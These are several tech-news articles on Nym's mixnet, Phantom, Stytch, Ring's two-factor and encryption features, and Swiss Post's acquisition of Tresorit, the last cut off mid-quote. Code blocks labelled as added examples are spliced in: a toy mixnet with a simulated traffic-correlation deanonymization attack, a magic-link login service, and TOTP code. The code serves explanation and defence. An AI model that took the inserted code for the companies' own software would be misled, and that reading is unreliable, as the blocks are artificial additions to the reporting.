Since Snowden’s big reveal, there’s been a slow burn of momentum for privacy tech — with rising consumer awareness fuelling usage of services like e2e encrypted email and messaging apps. Sometimes in spurts and spikes, related to specific data breaches and scandals. Or indeed privacy-hostile policy changes by mainstream tech giants (hi Facebook!).

Legal clashes between surveillance laws and data protection rights are also causing growing b2b headaches, especially for US-based cloud services, while growth in cryptocurrencies is driving demand for secure infrastructure to support crypto trading.

In short, the opportunity for privacy tech, both b2b and consumer-facing, is growing. And the team behind Nym thinks conditions look ripe for general purpose privacy-focused networking tech to take off too.

Of course there is already a well known anonymous overlay network in existence: Tor, which does onion routing to obfuscate where traffic was sent from and where it ends up.

The node-hopping component of Nym’s network shares a feature with the Tor network. But Tor does not do packet mixing — and Nym’s contention is that a functional mixnet can provide even stronger network-level privacy.

It sets out the case on its website — arguing that “Tor’s anonymity properties can be defeated by an entity that is capable of monitoring the entire network’s ‘entry’ and ‘exit’ nodes” since it does not take the extra step of adding “timing obfuscation” or “decoy traffic” to obfuscate the patterns that could be exploited to deanonymize users.

“Although these kinds of attacks were thought to be unrealistic when Tor was invented, in the era of powerful government agencies and private companies, these kinds of attacks are a real threat,” Nym suggests, further noting another difference in that Tor’s design is “based on a centralized directory authority for routing”, whereas Nym fully decentralizes its infrastructure.

Proving that suggestion will be quite the challenge, of course. And Nym’s CEO is upfront in his admiration for Tor — saying it is the best technology for securing web browsing right now.

“Most VPNs and almost all cryptocurrency projects are not as secure or as private as Tor — Tor is the best we have right now for web browsing,” says Nym founder and CEO Harry Halpin. “We do think Tor made all the right decisions when they built the software — at the time there was no interest from venture capital in privacy, there was only interest from the US government. And the Internet was too slow to do a mixnet. And what’s happened is speed up 20 years, things have transformed.

“The US government is no longer viewed as a defender of privacy. And now — weirdly enough — all of a sudden venture capital is interested in privacy and that’s a really big change.”

With such a high level of complexity involved in what Nym’s doing it will, very evidently, need to demonstrate the robustness of its network protocol and design against attacks and vulnerabilities on an ongoing basis — such as those seeking to spot patterns or identify dummy traffic and be able to relink packets to senders and receivers.

The tech is open source but Nym confirms the plan is to use some of the Series A funding for an independent audit of new code.

It also touts the number of PhDs it’s hired to-date — and plans to hire a bunch more, saying it will be using the new round to more than double its headcount, including hiring cryptographers and developers, as well as marketing specialists in privacy.

The main motivation for the raise, per Halpin, is to spend on more R&D to explore — and (he hopes) — solve some of the more specific use-cases it’s kicking around, beyond the basic one of letting developers use the network to shield user traffic (a la Tor).

Nym’s whitepaper, for example, touts the possibility for the tech being used to enable users to prove they have the right to access a service without having to disclose their actual identity to the service provider.

Another big difference vs Tor is that Tor is a not-for-profit — whereas Nym wants to build a for-profit business around its Mixnet.

It intends to charge users for access to the network — so for the obfuscation-as-a-service of having their data packets mixed into a crowd of shuffled, encrypted and proxy node-hopped others.

But potentially also for some more bespoke services — with Nym’s team eyeing specific use-cases such as whether its network could offer itself as a ‘super VPN’ to the banking sector to shield their transactions; or provide a secure conduit for AI companies to carry out machine learning processing on sensitive data-sets (such as healthcare data) without risking exposing the information itself.

“The main reason we raised this Series A is we need to do more R&D to solve some of these use-cases,” says Halpin. “But what impressed Polychain was they said wow there’s all these people that are actually interested in privacy — that want to run these nodes, that actually want to use the software. So originally when we envisaged this startup we were imagining more b2b use-cases I guess and what I think Polychain was impressed with was there seemed to be demand from b2c; consumer demand that was much higher than expected.”

Halpin says they expect the first use-cases and early users to come from the crypto space — where privacy concerns routinely attach themselves to blockchain transactions.

The plan is to launch the software by the end of the year or early next, he adds.

“We will have at least some sort of chat applications — for example it’s very easy to use our software with Signal… so we do think something like Signal is an ideal use-case for our software — and we would like to launch with both a [crypto] wallet and a chat app,” he says. “Then over the next year or two — because we have this runway — we can work more on kind of higher speed applications. Things like try to find partnerships with browsers, with VPNs.”

At this (still fairly early) stage of the network’s development — an initial testnet was launched in 2019 — Nym’s eponymous network has amassed over 9,000 nodes. These distributed, crowdsourced providers are only earning a NYM reputation token for now, and it remains to be seen how much exchangeable crypto value they might earn in the future as suppliers of key infrastructure if/when usage takes off.

Why didn’t mixnets as a technology take off before, though? After all, the idea dates back to the 1980s. There is a range of reasons, according to Halpin, issues with scalability being one of them. And a key design “innovation” he points to in its implementation of mixnet technology is the ability to keep adding nodes so the network can scale to meet demand.

Another key addition is that the Nym protocol injects dummy traffic packets into the shuffle to make it harder for adversaries to decode the path of any particular message — aiming to bolster the packet mixing process against vulnerabilities like correlation attacks.

While the Nym network’s crypto-style reputation and incentive mechanism — which works to ensure the quality of mixing (“via a novel proof of mixing scheme”, as its whitepaper puts it) — is another differentiating component Halpin flags.

“One of our core innovations is we scale by adding servers. And the question is how do we add servers? To be honest we added servers by looking at what everyone had learned about reputation and incentives from cryptocurrency systems,” he tells TechCrunch. “We copied that — those insights — and attached them to mix networks. So the combination of the two things ends up being pretty powerful.

“The technology does essentially three things… We mix packets. You want to think about an unencrypted packet like a card, an encrypted packet you flip over so you don’t know what the card says, you collect a bunch of cards and you shuffle them. That’s all that mixing is — it just randomly permutates the packets… Then you hand them to the next person, they shuffle them. You hand them to the third person, they shuffle them. And then they hand the cards to whoever is at the end. And as long as different people gave you cards at the beginning you can’t distinguish those people.”
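The card-shuffling description above, and the entry/exit correlation attack on Tor that Nym’s website describes, as an added example that is not Nym’s code: a toy three-mix cascade carrying fixed-size, layer-encrypted packets, watched by a global passive adversary who logs every packet on every link. With the mixes acting as plain relays (arrival order preserved), matching the i-th packet in to the i-th packet out links every sender to their recipient; once each mix shuffles its batch, the same attack does no better than guessing. Cover (dummy) traffic and timing are not modelled, the hash-counter “cipher” and the per-hop key dictionary stand in for a real stream cipher and for keys sealed to each mix’s public key, and the sender and recipient names are constructed.

```python
# Added example, not Nym's code: a toy three-mix cascade that shuffles batches of
# fixed-size, layer-encrypted packets. A global passive adversary logs every link and
# tries the entry/exit correlation that works against an unmixed path. Cover (dummy)
# traffic and timing are not modelled; the hash-counter "cipher" stands in for a real one.
import hashlib
import random
from dataclasses import dataclass

PACKET_SIZE = 64                    # uniform length, so size cannot link packets
MIXES = ["mix1", "mix2", "mix3"]    # every packet takes the same three hops


def keystream(key, n):
    """Hash-counter keystream; a stand-in for a real stream cipher in this toy."""
    out = b""
    for ctr in range((n + 31) // 32):
        out += hashlib.sha256(key + ctr.to_bytes(4, "big")).digest()
    return out[:n]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


@dataclass
class Packet:
    body: bytes       # the only thing visible on the wire
    hop_keys: dict    # fresh per-hop keys; stands in for keys sealed to each mix's public key


def wrap(rng, recipient, text):
    """Sender: the recipient rides inside the innermost layer; one layer per mix."""
    body = f"{recipient}:{text}".encode().ljust(PACKET_SIZE, b"\x00")
    hop_keys = {m: rng.getrandbits(128).to_bytes(16, "big") for m in MIXES}
    for m in reversed(MIXES):                       # last mix's layer goes on first
        body = xor_bytes(body, keystream(hop_keys[m], PACKET_SIZE))
    return Packet(body, hop_keys)


def mix(name, batch, rng, shuffle):
    """A mix strips its own layer from every packet in the batch, then forwards the batch
    in random order (shuffle=True) or in arrival order (shuffle=False, a plain relay)."""
    out = [Packet(xor_bytes(p.body, keystream(p.hop_keys[name], PACKET_SIZE)), p.hop_keys)
           for p in batch]
    if shuffle:
        rng.shuffle(out)
    return out


def deliver(body):
    """Final hop: with all three layers stripped the packet is plaintext 'recipient:text'."""
    recipient, text = body.rstrip(b"\x00").decode().split(":", 1)
    return recipient, text


def run(n, shuffle, seed):
    """n senders each send 'hi' to their own recipient r<i> through the cascade.
    Returns (true sender->recipient map, the adversary's guess, delivered messages)."""
    rng = random.Random(seed)
    senders = [f"s{i}" for i in range(n)]
    truth = {s: f"r{i}" for i, s in enumerate(senders)}
    batch = [wrap(rng, truth[s], "hi") for s in senders]   # link 1: adversary sees sender per blob
    for m in MIXES:
        batch = mix(m, batch, rng, shuffle)
    out = [deliver(p.body) for p in batch]                  # link 4: adversary sees recipient per blob
    guess = {s: out[i][0] for i, s in enumerate(senders)}   # "i-th in is i-th out" correlation
    return truth, guess, out


def correlation_accuracy(n, shuffle, trials=1):
    """Fraction of sender->recipient pairs the entry/exit correlation gets right."""
    hits = 0
    for seed in range(trials):
        truth, guess, _ = run(n, shuffle, seed)
        hits += sum(guess[s] == truth[s] for s in truth)
    return hits / (n * trials)


def all_delivered(n, shuffle, seed=0):
    """Mixing must not break delivery: every recipient still gets its message."""
    truth, _, out = run(n, shuffle, seed)
    return sorted(out) == sorted((r, "hi") for r in truth.values())
```

`correlation_accuracy(8, shuffle=False)` is 1.0; with `shuffle=True` it averages about 1/8 over many seeds, the anonymity set being the whole batch. The batch is the weak point a practitioner should watch: if only one packet is in flight, or if the adversary can recognise a packet by its size or its timing, shuffling buys nothing, which is why a production mixnet pads packets to a fixed size and adds cover traffic.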

More generally, Nym also argues it’s an advantage to be developing mixnet technology that’s independent and general purpose — folding all sorts and types of traffic into a shuffled pack — suggesting it can achieve greater privacy for users’ packets in this pooled crowd vs similar tech offered by a single provider to only their own users (such as the ‘privacy relay’ network recently announced by Apple).

In the latter case, an attacker already knows that the relayed traffic is being sent by Apple devices whose owners subscribe to iCloud+, the tier that includes the relay. Whereas, as a general-purpose overlay layer, Nym can, in theory, provide contextual cover to users as part of its privacy mix. So another key point is that the level of privacy available to Nym users scales as usage does.

Historical performance issues with bandwidth and latency are other reasons Halpin cites for Mixnets being largely left on the academic shelf. (There have been some other deployments, such as Loopix — which Nym’s whitepaper says its design builds on by extending it into a “general purpose incentivized mixnet architecture” — but it’s fair to say the technology hasn’t exactly gone mainstream.)

Nonetheless, Nym’s contention is the tech’s time is finally coming; firstly because technical challenges associated with Mixnets can be overcome — because of gains in Internet bandwidth and compute power; as well as through incorporating crypto-style incentives and other design tweaks it’s introducing (e.g. dummy traffic) — but also, and perhaps most importantly, because privacy concerns aren’t simply going to disappear.

Indeed, Halpin suggests governments in certain countries may ultimately decide their exposure to certain mainstream tech providers which are subject to state mass surveillance regimes — whether that’s the US version or China’s flavor or elsewhere —  simply isn’t tenable over the longer run and that trusting sensitive data to corporate VPNs based in countries subject to intelligence agency snooping is a fool’s game.

(And it’s interesting to note, for example, that the European Data Protection Supervisor is currently conducting a review of EU bodies use of mainstream US cloud services from AWS and Microsoft to check whether they are in compliance with last summer’s Schrems II ruling by the CJEU, which struck down the EU-US Privacy Shield deal, after again finding US surveillance law to be essentially incompatible with EU privacy rights… )

Nym is betting that some governments will — eventually — come looking for alternative technology solutions to the spying problem. Although government procurement cycles make that play a longer game.

In the near term, Halpin says they expect interest and usage for the metadata-obscuring tech to come from the crypto world where there’s a need to shield transactions from view of potential hackers.

“The websites that [crypto] people use — these exchanges — have also expressed interest,” he notes, flagging that Nym also took in some funding from Binance Labs, the VC arm of the cryptocurrency exchange, after it was chosen to go through the Lab’s incubator program in 2018.

The issue for crypto users is their networks are (relatively) small, per Halpin — which makes them vulnerable to deanonymization attacks.

“The thing with a small network is it’s easy for random people to observe this. For example people who want to hack your exchange wallet — which happens all the time. So what cryptocurrency exchanges and companies that deal with cryptocurrency are concerned about is typically they do not want the IP address of their wallet revealed for certain kinds of transactions,” he adds. “This is a real problem for cryptocurrency exchanges — and it’s not that their enemy is the NSA; their enemy could be — and almost always is — an unknown, often lone individual but highly skilled hacker. And these kinds of people can do network observations, on smaller networks like cryptocurrency networks, that are essentially as powerful as what the NSA could do to the entire Internet.”

There are now a range of startups seeking to decentralize various aspects of Internet or common computing infrastructure — from file storage to decentralized DNS. And while some of these tout increased security and privacy as core benefits of decentralization — suggesting they can ‘fix’ the problem of mass surveillance by having an architecture that massively distributes data, Halpin argues that a privacy claim being routinely attached to decentralized infrastructure is misplaced. (He points to a paper he co-authored on this topic, entitled Systematizing Decentralization and Privacy: Lessons from 15 Years of Research and Deployments.)

“Almost all of those projects gain decentralization at the cost of privacy,” he argues. “Because any decentralized system is easier to observe because the crowd has been spread out… than a centralized system — to a large extent. If the adversary is sufficiently powerful enough all the participants in the system. And historically we believe that most people who are interested in decentralization are not experts in privacy and underestimate how easy it is to observe decentralized systems — because most of these systems are actually pretty small.”

He points out there are “only” 10,000 full nodes in Bitcoin, for example, and a similar amount in Ethereum — while other, newer and more nascent decentralized services are likely to have fewer nodes, maybe even just a few hundred or thousand.

And while the Nym network has a similar amount of nodes to Bitcoin, the difference is it’s a mixnet too — so it’s not just decentralized but it’s also using multiple layers of encryption and traffic mixing and the various other obfuscation steps which he says “none of these other people do”.

“We assume the enemy is observing everything in our software,” he adds. “We are not what we call ‘security through obscurity’ — security through obscurity means you assume the enemy just can’t see everything; isn’t looking at your software too carefully; doesn’t know where all your servers are. But — realistically — in an age of mass surveillance, the enemy will know where all your services are and they can observe all the packets coming in, all the packets coming out. And that’s a real problem for decentralized networks.”

Post-Snowden, there’s certainly been growing interest in privacy by design — and a handful of startups and companies have been able to build momentum for services that promise to shield users’ data, such as DuckDuckGo (non-tracking search); Protonmail (e2e encrypted email); and Brave (privacy-safe browsing). Apple, of course, also very successfully markets its premium hardware under a ‘privacy respecting’ banner.

Halpin says he wants Nym to be part of that movement; building privacy tech that can touch the mainstream.

“Because there’s so much venture capital floating into the market right now I think we have a once in a generation chance — just as everyone was excited about p2p in 2000 — we have a once in a generation chance to build privacy technology and we should build companies which natively support privacy, rather than just trying to bolt it on, in a half hearted manner, onto non-privacy respecting business models.

“Now I think the real question — which is why we didn’t raise more money — is, is there enough consumer and business demand that we can actually discover what the cost of privacy actually is? How much are people willing to pay for it and how much does it cost? And what we do is we do privacy on such a fundamental level is we say what is the cost of a privacy-enhanced byte or packet? So that’s what we’re trying to figure out: How much would people pay just for a privacy-enhanced byte and how much does just a privacy enhanced byte cost? And is this a small enough marginal cost that it can be added to all sorts of systems — just as we added TLS to all sorts of systems and encryption.”

#aws, #binance-labs, #blockchain, #cloud-services, #cryptocurrency, #cryptography, #encryption, #europe, #european-union, #machine-learning, #p2p, #polychain-capital, #privacy, #privacy-technology, #routing, #snowden, #surveillance-law, #tc, #tor, #vpn

Crypto startup Phantom banks funding from Andreessen Horowitz to scale its multi-chain wallet

While retail investors grew more comfortable buying cryptocurrencies like Bitcoin and Ethereum in 2021, the decentralized application world still has a lot of work to do when it comes to onboarding a mainstream user base.

Phantom is part of a new class of crypto startups looking to build infrastructure that streamlines blockchain-based applications and provides a more user-friendly UX for navigating the crypto world, something that can make the entire space more approachable to a non-developer audience. Users can download the Phantom wallet to their browsers to interact with applications, swap tokens and collect NFTs.

The crypto wallet startup has banked a $9 million Series A round led by Andreessen Horowitz (a16z) with Variant Fund, Jump Capital, DeFi Alliance, Solana Foundation and Garry Tan also participating. The round, which closed earlier this summer, comes as some venture capital firms embrace a crypto future even as volatility continues to envelop the broader market. Last month, a16z announced a whopping $2.2 billion crypto fund, the firm’s largest vertical-specific investment vehicle ever.


The co-founding team of CEO Brandon Millman, CPO Chris Kalani and CTO Francesco Agosti all come aboard from crypto infrastructure startup 0x.

At the moment, Phantom is best-known among the Solana community where it has become the go-to wallet for applications on that blockchain. The startup’s ambition is to interface with more and more networks, currently building out compatibility with Ethereum and looking to embrace other blockchains, aiming to be a product built for a “multi-chain world,” Millman tells TechCrunch.

Alongside building out support for other networks, Phantom wants to build more sophisticated DeFi mechanisms right into their wallet, allowing users to stake cryptocurrencies and swap more tokens inside the wallet.

The startup says they have some 40,000 users of their existing wallet product.

Building out a presence on the popular Ethereum blockchain, which already has a handful of popular wallet providers, will be a challenge, but Phantom’s broadest challenge is helping a new breed of crypto-curious users interface with a network of apps that still have a long way to go when it comes to being mainstream-friendly.

“The entire space is kind of stuck in this ‘built by developers for other developers mode,’” Millman says. “This bar has been kind of stuck there, and no one is really stepping up to push the bar up higher.”

#andreessen-horowitz, #articles, #bitcoin, #blockchain, #blockchains, #ceo, #crypto-startups, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralization, #decentralized-finance, #ethereum, #garry-tan, #jump-capital, #retail-investors, #tc, #techcrunch, #venture-capital-firms

Ex-Plaid employees raise $30M for Stytch, an API-first passwordless authentication platform

There are few things more annoying than managing one’s passwords.

There are a bunch of companies out there to help you attempt to do that. And there’s also a number of companies that want to go a step further and eliminate the password completely.

One such company, Stytch, just raised $30 million in a Series A round of funding as it launches out of beta with its API-first passwordless authentication platform.

The round caught our attention for a couple of reasons.

For one, this is the same startup that just months earlier announced it had raised a $6.25 million seed round led by Benchmark with participation from Index Ventures and a number of angels including Plaid co-founder William Hockey. That round was speculated to have valued the new company at a staggering $200 million (although that was never confirmed), and was actually raised last summer around the time of Stytch’s founding, but only announced this year. Other angels that have backed the company include Figma co-founder and CEO Dylan Field, Very Good Security co-founder Mahmoud Abdelkader, startup advisor Elad Gil and early Stripe employee and Cocoon co-founder Amber Feng.

Also notable about this round is that Stytch was founded by two former Plaid employees, Reed McGinley-Stempel (CEO) and Julianna Lamb (CTO), who built user authentication features that “millions” use to connect their bank accounts to apps like Venmo, Coinbase and Robinhood. The company was founded on the premise that passwords are no longer secure, and make companies easy targets for hackers and expose them to account takeover risk.

Lamb says that as she and McGinley-Stempel worked together at Plaid on user authentication, they realized how frustrating it is to build sign-up and login flows.

“In addition to it being complicated, it’s resource intensive and error-prone to build in house,” she told TechCrunch. “The other thing that really frustrated us was that the core building blocks that all companies use for authentication had really significant security and conversion issues. It struck us that the web has improved in so many ways over the past few decades, but authentication is still stuck in the 1990s.”

Thrive Capital led the Series A, which also included participation from Coatue Management and existing backers Benchmark and Index. The company declined to reveal its new valuation, although sources say only that it is “north of $200 million.”

Stytch claims that it simplifies the authentication process by giving developers and users the “tools and infrastructure to incorporate passwordless authentication methods into modern applications.”

Specifically, the team is creating “simple” APIs and SDKs (software development kits) that the founders say allow “any company to boost user onboarding and retention by removing passwords from their application, while improving security and saving significant engineering time in the process.”


In its first year of operation, Stytch released its product in beta to more than 350 developers who have added passwordless features such as email magic links, SMS and WhatsApp passcodes and one-click user invitations into their user onboarding and authentication login flows. As mentioned above, Stytch launched out of beta this week to make all of the features publicly available in conjunction with the funding announcement. 
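The email magic link named above is, mechanically, a one-time bearer token sent out of band. The following is an added illustration of that flow in Python, generic and not Stytch’s API or code; the class, field and URL names and the 15-minute lifetime are this example’s own choices. The properties a practitioner should check for in any implementation are all here: the token comes from the CSPRNG, only its hash is stored server-side (a leaked table does not yield usable links), it expires, it is single use, and every failure returns the same result.

```python
"""Email magic-link issuance and redemption (added example, generic pattern).

Added illustration of the passwordless flow the article describes; it is not
Stytch's code or API. Names, the TTL and the base URL are this example's
assumptions."""
import hashlib
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

TOKEN_TTL_SECONDS = 15 * 60   # short-lived: the link sits in an inbox (assumed value)


@dataclass
class PendingLogin:
    email: str
    expires_at: float
    used: bool = False


class MagicLinkService:
    """Issues one-time login links and redeems them.

    Only sha256(token) is stored, so a leaked table does not hand out usable
    links; the raw token exists only in the email that was sent."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._pending: Dict[bytes, PendingLogin] = {}
        self._clock = clock                        # injectable for testing expiry
        self.outbox: List[Tuple[str, str]] = []    # stands in for the mail sender

    def issue(self, email: str, base_url: str = "https://app.example/login") -> str:
        """Create a link for `email` and 'send' it; returns the link."""
        email = email.strip().lower()              # normalise so the identity binds cleanly
        token = secrets.token_urlsafe(32)          # 256 bits from the CSPRNG, URL-safe
        key = hashlib.sha256(token.encode("ascii")).digest()
        self._pending[key] = PendingLogin(email, self._clock() + TOKEN_TTL_SECONDS)
        link = f"{base_url}?token={token}"
        self.outbox.append((email, link))
        return link

    def redeem(self, token: str) -> Optional[str]:
        """Return the verified email address, or None on any failure.

        Unknown, replayed and expired tokens are all rejected the same way, and
        a token is burned on first successful use so a re-click of the link
        (or an attacker replaying it) gets nothing."""
        key = hashlib.sha256(token.encode("ascii", "ignore")).digest()
        rec = self._pending.get(key)
        if rec is None or rec.used:
            return None
        if self._clock() > rec.expires_at:
            del self._pending[key]
            return None
        rec.used = True                            # single use
        return rec.email


if __name__ == "__main__":
    svc = MagicLinkService()
    link = svc.issue("Alice@Example.com")          # constructed sample input
    token = link.split("token=", 1)[1]
    print("first redeem :", svc.redeem(token))     # alice@example.com
    print("second redeem:", svc.redeem(token))     # None (replayed)
```

The lookup is by hash, so the server never needs the raw token after it has been mailed; a real deployment would also rate-limit issuance per address and bind the resulting session to the browser that clicked, since the link itself is all an attacker who reads the inbox needs.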

“What we found is that it makes more sense to be more flexible with developers,” Lamb told TechCrunch. “The thing that even surprised us about the API-first approach is that we now also have a handful of Fortune 500 companies using the product and the primary reasoning from their standpoint was one of the simplicity of getting set up on the platform. It took them an hour rather than the multiple months they sometimes spend with other providers. There is also the direct API piece where it’s just a much more flexible way to think about workflows in onboarding or login.”

Nearly 65% of users reuse passwords across accounts, which can pose major security threats and breach liabilities, according to a study conducted by Google. Also, many people struggle with remembering passwords and the password reset process can be so frustrating that many users just give up on the account.

This can negatively impact businesses that rely on e-commerce sites, who lose customers over that frustration.

Thrive’s Gaurav Ahuja, who is taking a seat on Stytch’s board with the funding round, believes that the startup’s product is specifically designed for improving sign-up conversion and user retention, and its customizable front end tools help companies get started “quickly.”

He said his firm talked to many developers who used it and saw “how impressed they were with the company’s best-in-class API docs and speed to go live.”

“Over the past several years we’ve seen that most authentication systems are both outdated and pose a security risk to users,” Ahuja told TechCrunch via email. “Stytch is addressing both of these issues head on.”

The new capital will be used to roll out more authentication options, including biometrics, WebAuthn, OAuth logins, QR codes and push notification login. The company also plans to launch additional user infrastructure features and to build out session management and advanced fraud detection solutions. Stytch also aims to hire 20 people by year’s end.

Stytch is not the only company out to kill the password. Boston-based Transmit Security in June raised a massive $543 million in Series A funding in what was believed to be the largest Series A investment in cybersecurity history and one of the highest valuations for a bootstrapped company. Microsoft has announced plans to make Windows 10 password-free, and Apple recently previewed Passkeys in iCloud Keychain, a method of passwordless authentication built on WebAuthn.

 

#access-control, #api, #bank, #coinbase, #computer-security, #cryptography, #funding, #fundings-exits, #password, #plaid, #recent-funding, #secret-double-octopus, #security, #sms, #startups, #stytch, #tc, #thrive-capital, #venmo, #venture-capital, #william-hockey

Ring’s latest security updates are good, but still opt-in

Ring, the video doorbell maker dubbed the “largest civilian surveillance network the U.S. has ever seen,” is rolling out new but long overdue security and privacy features.

The Amazon-owned company’s reputation was bruised after a spate of account breaches in late 2019, in which hackers broke into Ring user accounts and harassed children in their own homes. Taking advantage of Ring’s weak security practices, hackers had developed bespoke software to brute-force the passwords on Ring accounts, which at that point were protected by nothing more than the user’s password. All the while, several caches of Ring user passwords were floating around the dark web. Ring initially blamed its users for choosing weak passwords (like “password” and “12345678,” which Ring allowed users to set), but a couple of months later the company acknowledged its failings by rolling out mandatory two-factor authentication by text message. It was a good start, making it harder, if only slightly, for the bulk of automated account hijacks to succeed.

But now Ring is going a step further by rolling out app-based two-factor authentication, which many companies have offered for some time. It is the more secure option because an authenticator app generates each code on the device itself from a secret shared with the service once at setup, so no code ever travels over a channel that can be intercepted; text-message codes, by contrast, can be intercepted or redirected, SIM-swap fraud being the common route.
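What an authenticator app actually computes, as an added example that is not Ring’s code: RFC 4226 HOTP and RFC 6238 TOTP using only Python’s standard library, plus the server-side check, which tolerates one time step of clock skew and compares codes in constant time. The secret is the test key from the RFCs; the function names, the enrollment helper and the one-step window are this example’s choices.

```python
"""RFC 4226 HOTP / RFC 6238 TOTP, the scheme behind authenticator apps.

Added example, not Ring's code. It shows that the one-time code is derived
locally from a secret shared once at enrollment, so nothing is 'delivered'
to the user that an SMS interceptor could read."""
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP(K, C): HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """TOTP = HOTP(K, floor(unix_time / step)); both sides need only K and a clock."""
    return hotp(secret, at // step, digits)


def verify_totp(secret: bytes, candidate: str, at: int, window: int = 1,
                step: int = 30, digits: int = 6) -> bool:
    """Server-side check.

    Accepts the code for the current step or up to `window` steps either side
    (phone clocks drift), compares in constant time and never exits early, so
    timing does not reveal which step matched. A production server must also
    remember the last accepted step and refuse a second login with the same
    code (replay), which is left out here."""
    if len(candidate) != digits or not (candidate.isascii() and candidate.isdigit()):
        return False
    ok = False
    for offset in range(-window, window + 1):
        expected = hotp(secret, at // step + offset, digits)
        ok |= hmac.compare_digest(expected, candidate)
    return ok


def secret_from_base32(s: str) -> bytes:
    """Apps enroll from a base32 secret (the otpauth:// URI behind the QR code).
    Assumed helper: tolerates the spaces and missing padding seen in the wild."""
    s = s.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


if __name__ == "__main__":
    k = b"12345678901234567890"                   # RFC 4226 / RFC 6238 test secret
    print("HOTP counter 0 :", hotp(k, 0))         # 755224 per RFC 4226
    print("TOTP at t=59   :", totp(k, 59))        # 287082 per RFC 6238 (6 digits)
    now = int(time.time())
    print("verify (skewed):", verify_totp(k, totp(k, now), now + 20))
```

The secret is the whole security of the scheme: it must be generated from a CSPRNG at enrollment and stored server-side as carefully as a password hash would be. Note what this does and does not fix: an attacker cannot read the code off the wire, but a real-time phishing page can still relay a freshly typed code, which is the gap WebAuthn closes.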

Ring is also enabling CAPTCHA in its apps to add another hurdle aimed at making automated login attempts more difficult by prompting users to prove they aren’t a robot.

Also announced is the launch of video end-to-end encryption, which Ring first rolled out earlier this year as a technical preview. One of Ring’s most flaunted (though highly controversial) features is allowing users to share video footage directly with more than 1,800 local police departments that are partnered with Ring. That said, police with a search warrant can always just demand the footage from Ring instead. Video end-to-end encryption will mean that any video captured from a Ring device can only be accessed by the account owner — and not Ring, or any of its law enforcement partners.

Ring’s CTO Josh Roth said in a blog post that Ring believes that “our customers should control who sees their videos.” If that were true, Ring would have switched on end-to-end encryption to all users, giving every account owner privacy by default. But that would interfere with the company’s efforts to expand its police partnerships, which in turn help to get Ring devices into the hands of local residents.

Compared to past security updates, which didn’t go nearly far enough, Ring’s new features make meaningful changes that give users the choice to make their accounts more secure and their data private. But the keyword there is “choice,” since users will have to opt-in to the new features. That isn’t unusual in itself; companies seldom force security changes on users fearing that it would add friction to the user experience, though recovering from an account hack because of poor security controls is undoubtedly worse.

Switching to app-based two-factor authentication is easy: go to Ring’s account settings and switch from codes sent by text message to codes generated by an authenticator app. We have a whole explainer on why it’s important, why you should use an app, and which apps you might want to use.

But the biggest change Ring users can make is to switch on end-to-end encryption on their accounts by going through the advanced settings of Ring’s control center. Switching on end-to-end encryption won’t limit what you can do with your account or stop you from sharing video footage with friends, family, or the police, but it will give you peace of mind knowing that you will have control of your data and what you do with it, and not Ring.

#access-control, #amazon, #apps, #computer-security, #cryptography, #cto, #dark-web, #encryption, #multi-factor-authentication, #password, #privacy, #ring, #security, #united-states

Swiss Post acquires e2e encrypted cloud services provider, Tresorit

Swiss Post, the former state-owned mail delivery firm which became a private limited company in 2013, diversifying into logistics, finance, transport and more (including dabbling in drone delivery) while retaining its role as Switzerland’s national postal service, has acquired a majority stake in Swiss-Hungarian startup Tresorit, an early European pioneer in end-to-end-encrypted cloud services.

Terms of the acquisition are not being disclosed. But Swiss Post’s income has been falling in recent years, as (snailmail) letter volumes continue to decline. And a 2019 missive warned its business needed to find new sources of income.

Tresorit, meanwhile, last raised back in 2018 — when it announced an €11.5M Series B round, with investors including 3TS Capital Partners and PortfoLion. Other backers of the startup include business angels and serial entrepreneurs like Márton Szőke, Balázs Fejes and Andreas Kemi. According to Crunchbase Tresorit had raised less than $18M over its decade+ run.

It looks like a measure of the rising store being put on data security that a veteran ‘household’ brand like Swiss Post sees strategic value in extending its suite of digital services with the help of a trusted startup in the e2e encryption space.

‘Zero access’ encryption was still pretty niche back when Tresorit got going over a decade ago but it’s essentially become the gold standard for trusted information security, with a variety of players now offering e2e encrypted services — to businesses and consumers.

Announcing the acquisition in a press release today, the pair said they will “collaborate to further develop privacy-friendly and secure digital services that enable people and businesses to easily exchange information while keeping their data secure and private”.

Tresorit will remain an independent company within Swiss Post Group, continuing to serve its global target regions of EU countries, the UK and the US, with the current management (founders), brand and service also slated to remain unchanged, per the announcement.

The 2011-founded startup sells what it brands as “ultra secure” cloud services — such as storage, file syncing and collaboration — targeted at business users (it has 10,000+ customers globally); all zipped up with a ‘zero access’ promise courtesy of a technical architecture that means Tresorit literally can’t decrypt customer data because it does not hold the encryption keys.

It said today that the acquisition will strengthen its business by supporting further expansion in core markets — including Germany, Austria and Switzerland. (The Swiss Post brand should obviously be a help there.)

The pair also said they see potential for Tresorit’s tech to expand Swiss Post’s existing digital product portfolio — which includes services like a “digital letter box” app (ePost) and an encrypted email offering. So it’s not starting from scratch here.

Commenting on the acquisition in a statement, Istvan Lam, co-founder and CEO of Tresorit, said: “From the very beginning, our mission has been to empower everyone to stay in control of their digital valuables. We are proud to have found a partner in Swiss Post who shares our values on security and privacy and makes us even stronger. We are convinced that this collaboration strengthens both companies and opens up new opportunities for us and our customers.”

Asked why the startup decided to sell at this point in its business development — rather than taking another path, such as an IPO and going public — Lam flagged Swiss Post’s ‘trusted’ brand and what he dubbed a “100% fit” on values and mission.

“Tresorit’s latest investment, our biggest funding round, happened in 2018. As usual with venture capital-backed companies, the lifecycle of this investment round is now beginning to come to an end,” he told TechCrunch.

